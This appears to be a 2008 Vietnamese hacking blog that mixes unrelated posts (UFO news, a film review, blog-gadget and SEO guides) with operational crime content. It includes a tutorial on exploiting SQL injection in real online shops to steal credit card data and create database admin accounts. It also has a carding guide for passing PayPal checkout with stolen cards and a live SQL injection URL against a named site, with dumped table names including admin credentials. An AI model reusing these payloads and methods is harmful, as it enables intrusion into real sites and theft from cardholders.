Nói trước... chỉ làm lúc victim đã out khỏi yahoo...
Nhớ đọc kỹ hướng dẫn trước khi làm
Download:
http://www.mediafire.com/?yacvc1m2olz
ĐỌC THÊM !!!!
Showing newest 24 of 34 posts from July 2008. Show older posts
Showing newest 24 of 34 posts from July 2008. Show older posts
ĐỌC THÊM !!!!
From N2CT
Thật ra thì cũng chẳng có nhiều kinh nghiệm gì lắm nên cái này gọi là tut cũng hơi áy náy.Dưới đây là một số kinh nghiệm dành cho anh em newbie.
1.Các shop asp hiện nay đã lỗi thời và được FIX lỗi gần hết rồi , nên các bạn đừng mất công làm gì nhiều với mấy shop VP-ASP, néu có hack được thì cũng toàn hàng phế thải.
lời khuyên:hãy hack shop CFM(ColdFusion) hoặc php, hai cái này còn có chút cháo cho anh em, nhưng nếu gặp shop asp thì cũng cứ khai thác nhé.
2.Khi hack shop thỉnh thoảng bạn gặp lỗi VBscript-runtime error
vd :http://victim.com?id=10, thông thường thì bạn hay bỏ qua nó vì không biết hack, nhưng bạn hãy thay id=cat xem , đảm bảo 80% sẽ xảy ra lỗi SQL --> khi đó hãy khai thác.
3.Khi tìm được một web bị lỗi SQL , bạn hãy để ý xem nó có chức năng order = CC ko, nếu ko có thì thôi, đừng mất công get.Chứ get xong 1 đống table mà ko có table chứa CC thì tức hộc máu.
4.Gặp các shop lỗi nào ngon ,có thể hack được , bạn hãy chú ý dưới footer của trang web.Thông thường thì nó sẽ ghi tên công ty thiết kế shop này(Desgin by).Đừng bỏ qua nó, hãy đi ngược trở lại trang của nó, vào mục khách hàng để xem các trang nó đã làm.Mình đảm bảo với các bạn những trang shop khác sẽ bị lỗi y hệt trang mình vừa hack.Tất cả cấu trúc trang web y xì nhau(vì cùng 1 công ty làm ra mà).Có lần mình đã trúng mánh mấy trang như thế , ăn Cvv đã đời luôn.
5.Khi ăn xong 1 shop , nhớ đánh dấu lịnk lại để tránh lần sau ăn lại.
6.KHi gặp một shop bị lỗi SQL nghiêm trọng,nhưng lại ko có CC, đừng vội bỏ đi mà hãy tìm cách leo lên sever của nó xem xét.Có thể có một số shop khác cũng để datta cùng với nó.Khi vào đc server bạn có quyền sinh sát với toàn bộ data, view CC, drop data....
SQL injection rất nguy hiểm, mặc dù có một số shop ko bị lỗi , nhưng chẳng hiểu vì sao vẫn mất CC .Hóa ra là thằng hàng xóm bị lỗi SQL , hacker nó chui từ hàng xóm sang, xin ít CC ăn tạm.
Sau đây mình xin demo bằng tools Áo khoác đen -tools tuy chạy chậm nhưng khá hay
link victim : http://www.dadstrucksales.com/traile...?productID=108
thêm dấu nháy báo lỗi, bỏ nó vào tools và khai thác như hình.
Xác định được user có quyền SA , ta tạo 1 usser mới , ở đây user là xin , pass = xin
SAu khi tạo được , user thì công việc còn lại là login vào serrver của nó để view data thôi.Để login thì bạn hãy ping địa chỉ IP của nó nhé, ở đây là 208.71.141.210
Sau đó mở chưong trình SQL server của microsoft lên và tiến hành login với user lúc nãy tạo
Link Download MSSQL Server 2005
http://ftp.unb.br/pub/windows/sql2005/
http://ftp.wsisiz.edu.pl/pub/pc/microsoft/sql2005/
http://www.drivenext.com/download/SQL2005/
http://alvin.hk/download/SQL2005/
ĐỌC THÊM !!!!
Từ Ngốc, StuN soạn lại cho nó có bài bản ...
Như anh em biết, hiện nay đa phần các site cho buôn và bán :D đều ăn cháo cùng thằng Paypal, mà thằng này không phải như mấy đứa WorldPay...
Đa phần anh em chúng ta đều sợ cái phần check out của thằng này, vì nó check rất kỹ, may mắn qua thì ngày mai cũng bị Frozen vì buy không kĩ (vd: Rapid)...
Chính vì thế, StuN mới soạn một TUT này, xem như chuẩn bị bài vở cho anh em tiếp thu.
Đầu tiên, ta cần quan tâm tới là sock.
Ở đây, ta có thể xài Pri socks, hoặc 5socks ( tùy, muốn xài cái nào thì xài 
) . Đặc biệt, ta có thể xài ip Việt Nam... mà quên nói, mấy cái kia phải không nằm trong Blacklist...
Để check Blacklist, ta vào trang này:http://mxtoolbox.com/blacklists.aspx
- Nhập IP của chú vào ( IP fake/IP VN ).
- Chờ nó check.
- Nếu nó ghi :
We notice you are on a blacklist. Click here for some suggestions.
Ráng chịu fake bằng con sock khác đi...
*** Bước 2: là về CCnon, CCnon có nhiều loại, nhiều hình, nhưng ở đây ta đề cập tới 3 loại : Visa, Master và American Express.
Qua bằng Visa và Master:
Nhập info đầy đủ hết, còn về Security Code thì ta nhập random 3 số...Thường là ramdom 3 lần là sẽ qua, ko thì 4 lần vì Paypal thấy mình ngứa mắt quá nên cho qua
Qua bằng American Express:
Với con này thì ta có thể nhập là 0000, để có tỉ lệ cao thì ta có thể nhập random 4 số với 6 ở đầu tiên...
vd:6532
6741
6000
*** Bước 3
Về phần address, Paypal nó check cái này dữ lắm cho nên với Address, ta nên kết thúc bằng :
Street => St
Road => Rd
Driver => Dr
Hết... 
ĐỌC THÊM !!!!
 |
Hạ sĩ Mark Proctor là một trong 3 binh sĩ nhìn thấy những vật thể lạ trên bầu trời khu doanh trại Tern Hill gần Shropshire, miền trung nước Anh. Anh đã nhanh tay dùng điện thoại di động quay lại những hình ảnh về các vật thể lạ và đã báo cáo chuyện này lên các tướng lĩnh quân sự cấp cao.
Hạ sĩ Proctor, 38 tuổi, cho hay các vật thể lạ mà anh miêu tả là “các hình lập phương xoay tròn” xuất hiện vào khoảng 11 giờ đêm hôm chủ nhật, 7/6.
| |
“Tôi đang gác trong đêm thì nghe thấy tiếng những người khác ở bên ngoài bắt đầu hò hét. Tôi đi ra mới biết nguyên nhân khiến mọi người xôn xao. Tôi nhìn thấy 13 vật thể bay trên bầu trời”.
“Chúng bay ngoằn nghèo nhưng tôi đã kịp quay được 2 cái trước khi chúng biến mất. Chúng trông giống như các hình lập phương xoay tròn nhiều màu sắc”.
“Tôi đã báo cáo đầy đủ chuyện này lên cấp trên và nộp cả đoạn video. Các binh sĩ khác cũng ngạc nhiên về sự xuất hiện của các vật thể lạ chẳng khác gì tôi”.
| | |
|
|
Một binh sĩ 19 tuổi khác đang tuần tra cũng cho hay anh đã nhìn thấy “hạm đội bay”. Binh sĩ xin được giấu tên nói: “Tôi nhìn thấy những vật thể bay trên bầu trời và tôi đã thông báo với chỉ huy tuần tra”.
“Có khoảng 30 tia sáng thoáng qua trong vòng vài phút. Chúng màu đỏ. Một binh sĩ khác cũng nhìn thấy chúng”.
Các chuyên gia của Bộ quốc phòng Anh đang nghiên cứu báo cáo và video của Proctor sau khi yêu cầu anh và 2 đồng đội không được tiết lộ bất kỳ thông tin nào về các vật thể lạ nói trên.
| |
Một phát ngôn viên của Bộ quốc phòng Anh nói: “Chúng tôi đang nghiên cứu video về UFO xem liệu có mối đe nào quân sự nào hay không”.
Vụ việc khu doanh trại Tern Hill diễn ra chỉ 2 giờ trước khi một chiếc trực thăng chở các quan chức quân đội Anh đã bị một vật thể lạ khổng lồ đe doạ khi máy bay của họ đang cố gắng hạ cánh tại căn cứ gần Cardiff, thuộc xứ Wales vào khoảng 1 giờ sáng.
| | |
| Sơ đồ các khu vực được thông báo là đã xuất hiện các vật thể lạ trong 3 ngày, từ 6-8/6. |
Một nữ nhân chứng nói: “Chúng đến từ một thế giới khác. Chúng không có âm thanh nhưng có các đốm sáng bên trong”.
ĐỌC THÊM !!!!
Đêm ở bảo tàng ra mắt trong dịp Giáng Sinh và đối tượng khán giả chủ yếu là thiếu nhi (dĩ nhiên, cùng với phụ huynh), vì thế nó gom hết tất cả những gì con nít yêu thích: bộ khung xương khủng long quẫy đuôi rối rít như … con chó, voi mamút đi lang thang giữa bảo tàng, quân La Mã đánh nhau với cao bồi Viễn Tây, tượng đá đầu người mê nhai kẹo ca su và thổi bong bóng !
Ben Stiller, lần đầu tiên đóng phim dành cho thiếu nhi (trước đó, anh cũng từng lồng tiếng cho phim hoạt hình Madagascar), vào vai Larry Daley, một người đàn ông thất nghiệp, đã ly dị vợ và đang phải cố gắng giành lại niềm tin từ đứa con trai nhỏ của mình. Larry nhận lời chân gác đêm tại Bảo tàng lịch sử tự nhiên ở New York, bất chấp rằng công việc này từng có bao nhiêu người nhận làm sau một đêm rồi… bỏ việc ngay sáng hôm sau. Gặp ba người bảo vệ già của bảo tàng để bàn giao công việc, Larry hoàn toàn không hiểu được ánh mắt kỳ lạ của họ, những lời khuyên kỳ lạ của họ cùng cuốn sổ cẩm nang ‘cứ mở ra và làm theo từng bước nếu có sự cố xảy ra là ổn”.
Ngay khi đồng hồ điểm nửa đêm, ‘sự cố’ xảy ra: tất cả mọi hình sáp trong bảo tàng bỗng hồi sinh nhờ vào phép lạ của một phiến đá Ai Cập cổ đại. Larry kinh hoàng khi thấy bộ xương khủng long đi… uống nước và rượt đuổi anh, đám người Mông Cổ với búa rìu trong tay rượt đuổi anh, đám cao bồi viễn Tây tí hon bắt trói anh và con khỉ Dexter ‘đáng yêu’ thì thó mất chìa khoá của anh và xé toạc cuốn cẩm nang hướng dẫn cách thoát khỏi tình cảnh này… May mắn thay, vị tổng thống thứ 26 của nước Mỹ, Teddy Roosevelt (Robin Williams thủ vai) đã giúp anh thu xếp mọi việc trước khi mặt trời mọc. Lời nguyền cổ đại phán rằng, nếu bất kỳ sinh vật nào trong bảo tàng này rời khỏi bảo tàng và không quay lại kịp trước khi mặt trời mọc, chúng sẽ hoá thành tro bụi.
Khi bình mình ló dạng, mọi thứ trở lại như cũ. Larry quá sợ hãi để tiếp tục công việc này, nhưng anh lại không thể bỏ công việc này bởi không muốn con trai anh nghĩ rằng cha mình là kẻ vô công rỗi nghề. Larry hiểu rằng, nếu muốn tồn tại ở bảo tàng này, anh phải hiểu được lịch sử, những câu chuyện về những nhân vật được trưng bày bên trong bảo tàng này. Anh tự tin trở lại bảo tàng vào đêm thứ hai, đem bật lửa tặng cho đám người nguyên thuỷ, mang kẹo cao su cho bức tượng đầu người của đảo Easter, khuyên nhủ hai phe lính Nam – Bắc trong cuộc nội chiến đừng bắn nhau nữa vì sự thật thì quân Nam Mỹ đã thua cuộc, dàn xếp cuộc cãi vã giữa anh chàng cao bồi Mỹ (Owen Wilson đóng) và tướng lĩnh La Mã (Steve Coogan đóng)…
Mọi chuyện không hề đơn giản như Larry nghĩ: một người nguyên thuỷ rời khỏi viện bảo tàng và hoá thành tro ngay trước mắt anh. Anh có nguy cơ bị mất việc làm. Đứa con trai bị tổn thương khi chứng kiến cha mình bị đuổi việc. Larry quyết quay trở lại bảo tàng lần nữa để chứng minh cho con trai của anh phép màu lạ kỳ trong bảo tàng kỳ lạ này. Điều anh không ngờ đến là có kẻ xấu đang tìm cách phá hoại bảo tàng, và những phép màu không xảy ra trong đêm thứ ba, đêm mà anh mang đứa con trai đến để vui đùa với bộ xương khủng long và làm quen vị tổng thống thứ 26 của nước Mỹ…
Khác với một số phim có cùng đề tài, Đêm ở bảo tàng không ‘thực tế hoá’ những giấc mơ bay bổng. Phép lạ trong bảo tàng không phải là một giấc mơ thoáng qua để dạy cho Larry một bài học. Đạo diễn Shawn Levy (khá thành công với thể loại phim hài như Cheaper by the Dozen, Pink Panther) đem đến cho Đêm ở bảo tàng không khí vui nhộn, tươi tắn và bay bổng với nhiều tình tiết thêm thắt vào kịch bản, vốn được đã chuyển thể cuốn sách dài 32 trang của Milan Trenc. Mặc dù câu chuyện khá rời rạc, thiếu những khoảng lặng cần thiết, thiếu các điểm nhấn tình cảm giữa cha con Larry, hay Larry và cô bạn đồng nghiệp ở bảo tàng, hay tổng thống Roosevelt và cô gái dẫn đường da đỏ, nhưng Đêm ở bảo tàng là minh chứng cụ thể cho triết lý của Hollywood hiện nay: đường dây câu chuyện không quan trọng, miễn sao có đủ các pha hấp dẫn để ‘bày trò’ phô diễn kỹ xảo và tấu hài trên phim là ăn khách. Thực tế, Đêm ở bảo tàng không chỉ thu về gần 180 triệu đôla sau một tháng công chiếu, mà còn đứng đầu bảng doanh thu ba tuần liên tục trong và sau mùa phim Giáng Sinh.
Download:http://www.adrive.com/public/a4b0f6d0fd28bdcced22c73928e5cc2e8b6bce4de81b66d2056be14fd7862349.html
ĐỌC THÊM !!!!
Thông tin:
Coded bởi XC của hce.
Scan cấu trúc website hoặc forum... mặc dù còn một số lỗi như không hiển thị hết hoặc hiển thị sai :D
Cách dùng :
Download về, bỏ vào một thư mục bất kỳ...
Chạy run, gõ :cmd
để vào DOS.
Sau đó, gõ :D:
Nếu bỏ vào C:\ thì đánh là C:
... cd file runcd scan
rồi chạy lệnh scanscan tên_web
Download:http://www.mediafire.com/?y5iv1bjydmi
ĐỌC THÊM !!!!
Download về, xong rồi cầm file bị dezend thả vào cái php.exe trong folder D1 hoặc D2
Download:
http://www.mediafire.com/?eb03cw22ji4
ĐỌC THÊM !!!!
--- X Group ---
Link inject 1 :
| http://vinafx.com.vn/news.php?id=-9999+Union+Select+All+version(),2 |
Exploited...
Có cả tablename và table con
[+] URL: http://vinafx.com.vn/news.php?id=-99...All+darkc0de,2
[-] Proxy Not Given
[+] Gathering MySQL Server Configuration...
Database: vinafx_data
User: Vinafx_db@localhost
Version: 5.0.20-community-log
[+] Starting current users database extraction...
[Database]: vinafx_data
[Table: Columns]
[0]admin: username,pass
[1]assignfunc: Stt,FuncID,UserID
[2]banner_logo: ma_bl,hinh_bl,mota_bl,banner_logo,cap_bl,url_bl,nh om_bl,lr
[3]chungkhoan: Stt,MACK,Name,KLCP,GiaTC,Thaydoi,Enable,PostedDate ,Gia1,KL1,Gia2,KL2,Gia3,KL3,Bluechip,SanID
[4]forex: stt,rate1,rate2,bid,ask,high,low
[5]forex_date: stt,fxdate
[6]func: Stt,Title,Link
[7]gia_vang: stt,dia_diem,mua_vao,ban_ra
[8]giavang: Stt,Name,PostedDate,Muavao,Banra,Enable
[9]lai_suat_nhtw: STT,TenTT,DonviTT,PhantramLS
[10]loai_nhom_tin: ma_lnt,ten_lnt
[11]member: Stt,Fullname,SoCMND,Address,Email,RegDay,UpdateDate,HSDung,Telephone,Mobile,Image,Description,Distri ctID,ProvinceID,username,password,macapbac,Fax,Web site,Flag1,Flag2
[12]member_topic: member_topic_id,macapbac,ma_nt
[13]muc_tin: ma_mt,ten_mt,mota_mt,imgs_mt,thutu_mt
[14]nhom_tin: ma_nt,Enable,ten_nt,mota_nt,ma_mt,url_nt,nhomcon_nt,imgs_nt,thutu_nt,ma_lnt,macapbac
[15]quang_cao: Stt,Title,Filename,Link,Ngay_BD,Ngay_KT,Thu_tu,Enable,Forever,Position,Logo_Banner
[16]tbl_datenewyorkfed: lastupdate
[17]tbl_newyorkfed: code,rate,lastupdate
[18]tblcapbac: macapbac,tencapbac
[19]tblconfig: KeyID,EnKey
[20]tbldistrict: DistrictID,DistrictName,ProvinceID
[21]tblnewsletter: emailadd,disable
[22]tblprovince: ProvinceID,ProvinceName,CountryID
[23]tbltv_cb: matv_cb,page,macapbac
[24]tin_chi_tiet: ma_tct,theo_bao,tieude_tct,hinh_tct,mota_tct,noidung_tct,ngaydang_tct,THEOBAO_TCT,ma_nt,solanxem_tct tinlienquan_tct,hoatdong_tct,hinhnho_tct,loai_tct, motahinh_tct,motahinhnho_tct,subdomain_tct,fxNews ,viewFree,hot_tct
[25]useronline: timestamp,username,ip,file
[26]users: Stt,Username,Password,Enable,Fullname,Email,Birthd ay,Address,Telephone,Mobile
[27]weblink: Stt,Title,Link
ĐỌC THÊM !!!!
Sau khi tạo dựng 1 blog hay website kha khá về mặt hình thức nhưng nội dung còn thiếu vắng và đặc biệt là không có các phần chức năng phụ trội thêm cho khách truy cập, bạn hoàn toàn có thể thêm các gadget dễ dàng vào blog hay website mà không cần phải biết nhiều về kỹ thuật lập trình. Chỉ qua vài thao tác đơn giản là đủ!
Gadget là các tiện ích sẵn có với chức năng đơn giản được các người dùng khác xây dựng nên và chia sẻ trên những mạng công cộng và ai cũng có thể sử dụng bằng cách đặt thiết lập của riêng mình cho gadget và sao chép đoạn mã về sử dụng. Trong phần hướng dẫn này, ta chọn phần Gadgets của Google để phần nào các bạn có thể an tâm hơn về uy tín lẫn tính năng.
Trình chơi nhạc trên blog
Không muốn tạo tài khoản rườm rà trên Imeem hay esnips rồi lần lượt nhập playlist, thay vào đó là chương trình có thể phát ngay bài nhạc mà bạn đang ưa thích để khách ghé thăm blog có thể thưởng thức ngay bên dưới bài viết (entry), ta sẽ dùng đến MP3 Player gadget.
Đầu tiên là nhập tiêu đề (Title) rồi đến độ rộng (Width) và chiều cao (Height) của box MP3 Player. Phần màu sắc viền quanh box sẽ chọn ở Border và liên kết dẫn đến tập tin nhạc sẽ điền đầy đủ vào Song URL, lưu ý là chỉ hỗ trợ định dạng MP3.
Sau khi nhập hoàn tất, nhấn vào nút "Preview Changes" để xem trước hoặc nhấn "Get the Code" để lấy mã HTML để chèn vào blog. Một khung chứa mã HTML sẽ xuất hiện, bạn chỉ cần copy toàn bộ đoạn code này và chèn vào blog entry ở chế độ soạn thảo HTML.
Ngoài MP3 Player, nếu là fan của YouTube thì bạn cũng có thể chèn YouTube Channel (kênh trên youTube) vào blog qua gadget này.
Cập nhật tin tức và thời tiết
Có khá nhiều gadget hỗ trợ cập nhật tin tức cho blog, nhưng bạn có thể sử dụng các gadget sau để đưa lên blog những tin tức mới nhất từ những hãng truyền thông lớn như: BBC News Feeds (trích xuất tin mới của BBC), ESPN Tabbed Sport Feeds (tin thể thao từ kênh ESPN), CNN News, Reuters News in Picture (Cập nhật tin tức qua hình ảnh từ Reuters) hay Google News (tổng hợp tin tức nhiều lĩnh vực).
Với số lượng gadget về tin tức ở trên, blog của bạn đã tương đối cập nhật kịp thời rất nhiều tin tức ở nhiều lĩnh vực khác nhau rồi đấy. Tuy vậy, vẫn còn muốn bổ sung thêm phần thông tin thời tiết thì có thể tham khảo 2 gadget sau: Weather.com và Weather Forecasts (dự báo thời tiết).
Bổ sung công cụ khác
Mục Tools của Google Gadgets chứa đựng khá nhiều gadget hay cho website. Từ gadget giúp gửi tin nhắn sms từ PC sang ĐTDĐ, lịch trực tuyến, Google Talk, Google Docs, YouTube Player... cách thức sử dụng các gadget này cũng tương tự như trên, chọn, thiết lập và lấy mã HTML để đưa vào blog.
Cuối cùng, không chỉ là những công cụ trong mục Tools, bạn còn có thể bổ sung hàng trăm gadget thuộc nhiều lĩnh vực khác nhau như tài chính, game, công nghệ... tại đây. Tuy nhiên, đừng khai thác quá nhiều gadget lên website hay blog của mình sẽ khiến cho thời gian tải trang chậm đi do gadget phải kết nối về những máy chủ để lấy dữ liệu.
ĐỌC THÊM !!!!
Tuy nhiên, nếu không rành về kỹ thuật, bạn có thể thử qua phần mềm System Information Viewer (SIV), một tiện ích miễn phí rất nhỏ gọn giúp bạn nhận biết được thông tin cấu hình trên máy tính của mình ở mức chi tiết nhất có thể.
Đầu tiên, bạn tải trực tiếp SIV tại địa chỉ www.softpedia.com/get/System/System-Info/System-Information-Viewer.shtml. Dùng Winrar hoặc Winzip để mở file, chạy file SIV.exe. Giao diện chính của chương trình trông khá là rối rắm với nhiều con số và ký tự, nhưng nếu để ý kỹ bạn sẽ phát hiện ra đây là những thông tin liên quan đến CPU cũng như chi tiết tài nguyên hệ thống đang được sử dụng trên máy tính. Kèm theo đó là các thông tin liên quan của hệ thống như tên người sử dụng, phiên bản Windows đang sử dụng, phiên bản của BIOS...
Bên dưới giao diện của chương trình là hàng loạt các nút bấm giúp bạn theo dõi các thông số khác trên hệ thống gồm dung lượng RAM đang hoạt động trên hệ thống, các cổng PCI, card đồ họa đang sử dụng...
Dựa vào những thông số này, bạn có thể đối chiếu với cấu hình tối thiểu và đề nghị mà nhà sản xuất game đề cập trong phần readme để xác định xem liệu máy tính có đủ sức để chơi hay không.
Ngoài ra, dựa vào đây bạn còn có thể khám phá ra nhiều điều khác như khả năng ép xung của CPU, quy chế hoặc động của các thiết bị... Chắc chắn SIV là tiện ích rất thích hợp và bổ ích với những ai học chuyên ngành kỹ thuật, công nghệ và đặc biệt là những game thủ không rành về tin học.
ĐỌC THÊM !!!!
Cách thức khai thác lỗi DNS nguy hiểm cho toàn mạng Internet đã bị phát tán sớm hơn so với dự kiến sẽ được công bố vào hội thảo Black Hat tại Las Vegas vào tháng sau. Dan Kaminsky bày tỏ thái độ không vui vì lời đề nghị giữ bí mật của mình về lỗi nguy hiểm trên đã không được thực hiện.
Dan Kaminsky cũng khuyến cáo tất cả các cơ quan, tổ chức, doanh nghiệp tiến hành vá lỗi DNS ngay lập tức, không được chần chừ vì lỗi đã được công bố và phát tán trên mạng. Các tin tặc có mưu đồ xấu rất có thể sẽ tiến hành các đợt càn quét các hệ thống máy chủ DNS. Mức độ cảnh báo bảo mật ở mức cao nhất.
Trung tâm VNCERT vừa qua cũng ra khuyến nghị cho các cơ quan, đoàn thể, tố chức doanh nghiệp tại Việt Nam tập trung vá lỗi DNS để ngăn ngừa các nguy cơ tấn công từ phía tin tặc.
Người dùng có thể tạm thời kiểm tra mức độ an toàn của hệ thống DNS qua DNS Checker tại blog của Dan Kaminsky.
Website hãng Kaspersky Malaysia bị tin tặc tấn công
Website của hãng phần mềm bảo mật Kaspersky tại Malaysia đã bị tin tặc "ghé thăm" và thay đổi giao diện. Hacker Thổ Nhĩ Kỳ có biệt danh "m0sted" đã thừa nhận đợt tấn công này thông qua lỗi SQL injection.
Theo thông tin công bố trên Zone-H, website Kaspersky Malaysia chạy trên hệ thống máy chủ Windows Server 2003 và IIS 6.0 đã bị m0sted tấn công qua lỗi SQL Injection. Sau khi hack thành công hệ thống website, m0sted đã đặt dòng tin nhắn "hacked by m0sted and amen Kaspersky Hax0red No War" lên phần tin tức của trang chủ của Kaspersky Malaysia.
Phía Kaspersky chưa đưa ra lời bình luận gì thêm về việc này nhưng e ngại các hành động phá hoại vẫn còn tiếp diễn vì những bản dùng thử của phần mềm bảo mật Kaspersky được sao chép lại trên hệ thống có thể đã bị tin tặc gắn mã độc. Nguy cơ lây nhiễm mã độc cho người dùng đã vô tư tin tưởng tải về cài đặt trên máy là khá cao.
Một điều trớ trêu là tin tặc thường nhắm tới các website của những hãng bảo mật và deface (*) chúng là một sở thích. Trong danh sách tấn công các hệ thống website của tin tặc m0sted còn có Toyota.co.za, resourcecenter.businessweek.com.. và gần như mỗi ngày đều có website mới là nạn nhân của tin tặc này.
(*) Deface một website là thay đổi giao diện của trang web đó nên khi khách truy cập ghé thăm địa chỉ trang web bị deface, nội dung trang sẽ không hiển thị bình thường như ban đầu mà bị thay đổi theo ý muốn của tin tặc. Đây là một cách chứng minh đã xâm nhập hệ thống website.
Mã độc nguy hiểm tấn công mạng P2P
Những fan hâm mộ âm nhạc đang sử dụng hệ điều hành Windows thường chia sẻ hay tải nhạc từ mạng ngang hàng P2P có nguy cơ bị lây nhiễm loại mã độc mới ẩn danh trong các tập tin nhạc MP3. Khi tải các tập tin MP3 đã bị lây nhiễm từ mạng P2P về máy, các mã độc ẩn danh này sẽ kích hoạt thực thi trình duyệt Internet Explorer kết nối đến trang web chứa virus hay trojan rồi yêu cầu người dùng tải về dưới lớp vỏ bọc codec.
Ẩn mã độc bên trong các tập tin nhạc chia sẻ trong mạng ngang hàng không phải lần đầu tiên. Các chuyên gia bảo mật khuyến cáo người dùng nên tải các mã codec lẫn tập tin nhạc MP3 từ những website đáng tin cậy và thực hiện công việc quét virus các tập tin vừa tải về trước khi chạy chúng trên hệ thống.
ĐỌC THÊM !!!!
FaceTime Security Lab, một phòng thí nghiệm an ninh ở Mỹ, vừa phát hiện một Trojan chuyên dùng để đánh cắp thông tin người dùng rất nguy hiểm có nguồn gốc từ Trung Quốc.
Chris Mannon, chuyên viên nghiên cứu cao cấp của Face Time cho biết mối đe dọa phishing mới nhất này được đặt tên là Sysda. Đây là một trojan dùng để ăn cắp mật khẩu người dùng khi truy cập vào các trang web ở Trung Quốc.
Sau khi xâm nhập vào máy tính, trojan này sẽ nằm im cho đến khi chính người dùng vô tình kích hoạt nó bằng cách truy cập vào các trang web có yêu cầu nhập tên người dùng và mật khẩu. Sysda sẽ đánh cắp các thông tin này và tự động gửi lên một trang web từ xa của các hacker.
Face Time cảnh báo trojan này sẽ nhanh chóng lan truyền sang các nơi khác trên toàn thế giới trong nay mai, mặc dù hiện nó chỉ nguy hiểm với người dùng ở Trung Quốc. "Với Sysda, tất cả công việc nó cần làm là móc nối vào tập tin iexplore.exe để đánh cắp các thông tin sử dụng của người dùng”, Chris Mannon nói.
FaceTime Security Lab là công ty chuyên cung cấp các giải pháp an ninh bảo vệ các ứng dụng như các chương trình tin nhắn nhanh, Skype, các chương trình dùng để hội thảo và chia sẻ dữ liệu ngang hàng.
ĐỌC THÊM !!!!
Từ khi bắt đầu viết blog cho đến thời điểm này tôi thường không quan tâm lắm về vấn đề tối ưu hóa công cụ tìm kiếm (SEO: Search Engine Optimization), hôm qua tình cờ tôi phát hiện một công cụ phân tích SEO của site và blog rất hay. Tôi đã thử kiểm tra blog của mình và nhận được nhiều lời khuyên bổ ích.
Website Grader là công cụ miễn phí đo hiệu quả tiếp thị của một website mà tôi muốn đề cập. Công cụ này cung cấp kết quả phân tích liên quan đến lưu lượng truy cập (traffic), tối ưu hóa công cụ tìm kiếm, đánh giá mức độ phổ biến của website trên các trang xã hội và các kỹ thuật khác. Bạn có thể nhập thông tin để so sánh website của mình với các đối thủ cạnh tranh hay bạn bè qua đó biết được trang của mình nằm ở mức nào trên thang điểm 100.
Việc nhập thông tin để kiểm tra khá đơn giản, bạn chỉ cần click vào đây và điền các thông tin bên dưới:
Website URL: Địa chỉ blog hoặc website.
Related Keywords: Từ khóa liên quan đến blog hoặc website của bạn.
Competing Websites: Địa chỉ blog hoặc website đối thủ mà mình muốn so sánh.
Your E-Mail: Địa chỉ email của bạn (Link xem báo cáo sẽ được gửi đến email).
Nếu không muốn nhận tin tức về SEO từ trang này bạn bỏ dấu kiểm tra ngay dưới địa chỉ email.
Sau đó nhấn Generate Report để xem kết quả.
HƯỚNG DẪN ĐỌC PHÂN TÍCH:
Kết quả chia thành nhiều phần khác nhau, với nhiều đánh giá đi kèm những lời khuyên hữu ích.
I. On-Page SEO: Xử lý việc đặt các từ khóa trên trang.
A. Metadata: Các thông số meta giúp công cụ tìm kiếm biết về trang của bạn.
B. Heading Summary: Số tiêu đề và tiêu đề con.
C. Image Summary: Số hình ảnh sử dụng.
E. Readability Level: Đánh giá trình độ giáo dục cần thiết để đọc và hiểu nội dung trang.
II. Off-Page SEO: Tất cả những gì bạn đã làm để tiếp thị trang.
A. Domain Info: Thông tin ngày hết hạn tên miền.
B. Google PageRank: Xếp hạng theo thuật toán PageRank của Google (thang điểm 10).
C. Google Indexed Pages: Số trang được Google đánh chỉ mục.
D. Last Google Crawl Date: Ngày cuối cùng Google đánh chỉ mục trang bạn.
E. Traffic Rank: Xếp hạng Alexa lưu lượng truy cập.
F. Inbound Links: Tổng số link bên trong blog.
III. Blogosphere: Đánh giá mức độ giao tiếp với đọc giả.
A. Blog Analysis: Phân tích việc sử dụng công cụ giao tiếp với đọc giả.
B. Blog Ranking: Xếp hạng blog dựa trên công cụ Technorati.
IV. Social Mediasphere: Số lượng bài viết được đánh dấu vào các trang xã hội.
A. del.icio.us bookmarks: Số lượng bookmark ở del.icio.us.
B. Digg.com Submission Summary: Số lượng bài được đăng vào Digg.
V. Converting Qualified Visitors to Leads: Đánh giá công cụ giúp khách quan tâm gắn kết với trang.
A. RSS Feed: Sử dụng feed.
B. Conversion Form: Sử dụng form trên blog.
VI. Competitive Intelligence: Tổng kết báo cáo so sánh với các đối thủ hoặc tổng kết trang.
Bạn có thể xem một số báo cáo:
ĐỌC THÊM !!!!
Ngày 20-07-2008, site http://www.vctv.vn đã bị hack.
"Cháu buộc phải del source của các chú vì trên site có rất nhiều shell và cháu sợ có kẻ xấu lợi dụng để tung những tin tức có hại. Mong các chú bảo mật site tốt hơn. Yahoo của cháu là: Wartanza"
Một số báo đã đăng thông tin này :
http://www.tuoitre.com.vn/Tianyon/Index.aspx?ArticleID=269677&ChannelID=16
báo tuổi trẻ định nghĩa về shell mà nghe buồn cười quá
shell (trình tiện ích được thiết kế dùng cho một giao diện người - máy)
cái shell ở đây không phải là shell hệ vỏ của các hệ thống linux mà nó gọi là web shell hay còn gọi là hacktool, một công cụ phục vụ cho việc tấn công website.
Wartanza là ai ?
Wartanza là mod của http://xgroupvn.org, (thông tin về nhóm này tạm thời dỡ xuống vì họ phản đối
)Sau vụ này khungmeox (sư phụ của Wartanza , ko biết có phải ko :B ) - tay chuyên phá phách lung tung phát biểu :
khungmeox: Thông báo: nhờ wartazan lên báo nên toàn thể staff và member X đc 1 suất vào trại giam chí hòa anh em cuốn gói chuển bị lên đường.
hì hì mải mê nói chuyện linh tinh quên mất việc chính. Theo thông tin khảo sát thì http://www.vctv.vn site không có lỗi mà thực chất Wartanza ko hack trực tiếp vào vctv.vn được. Tay này chơi theo kiểu gọi là local, kiểu chơi không đẹp. Bản thân Wartanza cũng khẳng định điều này.
xxxxxxxxxx: alô
xxxxxxxxxx: hi
War Tanza: chào
xxxxxxxxxx: bạn vừa hack trang vctv.vn à
xxxxxxxxxx: nó bị làm sao vậy
War Tanza:
War Tanza: local
War Tanza: giờ 1no đang fix
War Tanza: tui k6hog có phá hoại
xxxxxxxxxx:
War Tanza: del hết source
War Tanza: chứ không
xxxxxxxxxx: dưng mà nó bị làm sao
War Tanza: nó bị bọn phản động nhảy vào thì mệt lắm
xxxxxxxxxx: nó bị lỗi gì vậy
War Tanza: nó không có lôi
xxxxxxxxxx: bạn nói rõ hơn đê
xxxxxxxxxx: thế do thằng server à
War Tanza: ừa
xxxxxxxxxx:
War Tanza: do secu nưa
xxxxxxxxxx: server nhanhoa lởm thế cơ à
xxxxxxxxxx: do secu của server chứ gì
xxxxxxxxxx: còn site có lỗi gì ko
